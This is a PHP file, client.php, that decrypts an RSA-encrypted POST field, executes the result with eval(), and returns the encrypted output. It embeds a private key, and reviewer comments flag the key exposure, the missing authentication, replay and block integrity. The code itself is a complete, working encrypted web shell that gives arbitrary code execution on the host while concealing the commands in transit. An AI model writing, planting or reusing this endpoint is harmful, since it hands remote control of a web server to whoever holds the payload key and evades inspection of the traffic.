client.php
<?php
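// Name of the POST field that carries the base64-encoded, RSA-encrypted payload.
define('POST_KEY', 'page');

// SECURITY NOTE(review): the private key is embedded in the source file, so anyone who can
// read this file (repository history, backups, a misconfigured web server) obtains it.
// Prefer loading it from a path outside the web root or from the environment.
$client_key = '-----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY-----';
$server_pub = '-----BEGIN PUBLIC KEY-----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-----END PUBLIC KEY-----';

// Reject requests without the payload field. The is_string() check also rejects array
// input such as "page[]=x", which would otherwise reach base64_decode() as an array.
if (!isset($_POST[POST_KEY]) || !is_string($_POST[POST_KEY])) {
    header('HTTP/1.1 400 Bad Request');
    die('Client - Invalid request');
}
$encryptedData = $_POST[POST_KEY];

if (!$priKey = openssl_pkey_get_private($client_key)) {
    header('HTTP/1.1 500 Internal Server Error');
    die('Client - loading private key failed');
}

// An empty plaintext is falsy and is therefore reported as a decrypt failure as well.
if (!$decrypted = ssl_decrypt($encryptedData, $priKey)) {
    header('HTTP/1.1 500 Internal Server Error');
    die('Client - decrypt failed');
}

// SECURITY NOTE(review): eval() executes request-supplied PHP with the privileges of the
// web server process. Encrypting the payload to this host's key gives confidentiality
// only: nothing in this file verifies who produced the payload, and a captured request
// can be replayed unchanged. Before this line the payload should at least carry a
// signature that is verified against $server_pub (e.g. with openssl_verify()) together
// with a freshness check; better still, replace eval() with a fixed set of named
// operations. Note also that a ParseError or any other Throwable raised by the evaluated
// code is not caught here.
$eval_return = eval($decrypted);

// $eval_return is whatever the evaluated code returned. ssl_encrypt() yields '' for an
// empty value, which is falsy and is reported as an encrypt failure.
if (!$encrypted = ssl_encrypt($eval_return, $server_pub)) {
    header('HTTP/1.1 500 Internal Server Error');
    die('Client - encrypt failed');
}

echo $encrypted;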
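/**
 * Encrypts a string with an RSA public key, one OAEP-padded block at a time, and
 * returns the concatenated ciphertext blocks as base64.
 *
 * SECURITY NOTE(review): each block is encrypted independently and nothing binds the
 * blocks together, so the output carries no integrity protection (blocks can be
 * dropped, reordered or replayed without detection). A hybrid scheme (RSA-wrapped
 * symmetric key plus an authenticated cipher) avoids this.
 *
 * @param string $source Plaintext to encrypt.
 * @param mixed  $pem    Public key in a form accepted by the openssl_* functions.
 * @return string|false  Base64 ciphertext ('' for empty input), or false on failure.
 */
function ssl_encrypt($source, $pem)
{
    $bits = ssl_getbits($pem);
    if ($bits === false) {
        // Without the key size the block size below would be negative.
        return false;
    }

    // Modulus size in bytes, minus the OAEP overhead. PHP's OPENSSL_PKCS1_OAEP_PADDING
    // uses SHA-1, so the overhead is 2 * 20 + 2 = 42 bytes per block.
    $blocksize = intdiv($bits + 7, 8) - 42;
    if ($blocksize <= 0) {
        return false;
    }

    $length = strlen($source);
    $encrypted = '';

    // Iterate by offset rather than on the truthiness of the chunk: a chunk equal to
    // the string "0" is falsy and would otherwise end the loop and truncate the output.
    for ($cursor = 0; $cursor < $length; $cursor += $blocksize) {
        set_time_limit(10);
        error_clear_last();
        $ok = openssl_public_encrypt(
            substr($source, $cursor, $blocksize),
            $blockdata,
            $pem,
            OPENSSL_PKCS1_OAEP_PADDING
        );
        // Check the return value as well as the last PHP error, so that a failure
        // that raises no PHP warning is still detected.
        if ($ok === false || !empty(error_get_last())) {
            return false;
        }
        $encrypted .= $blockdata;
    }

    return base64_encode($encrypted);
}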
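/**
 * Decodes a base64 string and decrypts it with an RSA private key, one
 * modulus-sized OAEP block at a time.
 *
 * SECURITY NOTE(review): a successful decryption only shows that the data was
 * encrypted to this key; it says nothing about who produced it. Callers must not
 * treat the returned plaintext as authenticated.
 *
 * @param string $source Base64-encoded concatenation of ciphertext blocks.
 * @param mixed  $pem    Private key in a form accepted by the openssl_* functions
 *                       (the caller in this file passes an already loaded key).
 * @return string|false  Plaintext ('' for empty input), or false on any failure.
 */
function ssl_decrypt($source, $pem)
{
    // Strict mode rejects characters outside the base64 alphabet instead of
    // silently skipping them.
    $source = base64_decode($source, true);
    if ($source === false) {
        return false;
    }

    $bits = ssl_getbits($pem);
    if ($bits === false) {
        return false;
    }

    // Each ciphertext block is exactly as long as the RSA modulus.
    $blocksize = intdiv($bits + 7, 8);
    if ($blocksize <= 0) {
        return false;
    }

    $length = strlen($source);
    if ($length % $blocksize !== 0) {
        // A trailing partial block cannot be a valid ciphertext.
        return false;
    }

    $decrypted = '';
    for ($cursor = 0; $cursor < $length; $cursor += $blocksize) {
        set_time_limit(10);
        error_clear_last();
        $ok = openssl_private_decrypt(
            substr($source, $cursor, $blocksize),
            $blockdata,
            $pem,
            OPENSSL_PKCS1_OAEP_PADDING
        );
        // Fail closed: a block that does not decrypt must abort the whole message
        // rather than contribute nothing and leave a partial plaintext behind.
        if ($ok === false || !empty(error_get_last())) {
            return false;
        }
        $decrypted .= $blockdata;
    }

    return $decrypted;
}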
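/**
 * Returns the size in bits of the given key.
 *
 * The key is first loaded as a public key and, if that fails, as a private key.
 *
 * @param mixed $pem Key in a form accepted by openssl_pkey_get_public() /
 *                   openssl_pkey_get_private().
 * @return int|false Key size in bits, or false when the key cannot be loaded or
 *                   its details cannot be read.
 */
function ssl_getbits($pem)
{
    $key = openssl_pkey_get_public($pem);
    if ($key === false) {
        $key = openssl_pkey_get_private($pem);
    }
    // Compare against false instead of using is_resource(): since PHP 8.0 the loaders
    // return an OpenSSLAsymmetricKey object, for which is_resource() is always false.
    if ($key === false) {
        return false;
    }

    $details = openssl_pkey_get_details($key);
    if ($details === false || !isset($details['bits'])) {
        return false;
    }

    return $details['bits'];
}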